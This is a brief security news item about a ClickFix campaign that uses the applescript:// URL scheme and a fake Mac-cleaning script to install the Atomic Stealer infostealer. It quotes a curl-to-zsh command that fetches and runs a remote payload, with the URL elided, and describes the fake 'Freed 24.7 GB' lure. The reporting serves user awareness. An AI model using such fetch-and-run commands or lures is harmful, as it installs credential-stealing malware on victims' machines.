CLICKFIX has unveiled a new way to infect Macs by bypassing Terminal and using the applescript:// URL scheme to auto-open Script Editor with a pre-filled maintenance script that downloads a second-stage script and ultimately runs Atomic Stealer, also known as AMOS. The method still relies on social engineering, but now users are prompted to click a one-click “Apple script” that claims to clean the Mac and even shows a fake “Freed 24.7 GB” dialog.
Under the hood, the script executes do shell script "curl -kSsfL <obfuscated URL> | zsh" to fetch the next payload and a helper that delivers the Atomic Stealer variant. The article notes that ClickFix campaigns have been expanding with new methods to avoid detection, and that it was responsible for more than half of all malware loader activity in 2025, according to Huntress.
Users of macOS Tahoe are warned that security prompts may mislead them, and the piece reiterates the need to slow down and avoid running commands from untrusted sources.